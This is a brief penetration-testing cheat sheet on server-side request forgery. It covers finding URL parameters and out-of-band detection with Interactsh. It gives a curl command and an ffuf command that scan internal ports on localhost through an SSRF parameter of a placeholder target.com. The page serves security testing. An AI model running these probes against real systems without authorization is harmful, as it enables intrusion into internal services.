SSRF
Server-side request forgery
Enumeration
Look for parameters that accept URLs.
Test in forms, webhooks, or file uploads.
Test with
http://localhost
orhttp://127.0.0.1
.
Use Interactsh
to detect out-of-band (OOB
) interactions:
interactsh-client
Internal Port Scanning
Test for internal port access
curl "https://target.com/ssrf?url=http://localhost:22" -v
Use time-based delays or
OOB
techniques to detect open ports.Check if response is slower for open ports.
ffuf -w ports.txt -u https://target.com/ssrf?url=http://localhost:FUZZ -mc 200 -t 10
Last updated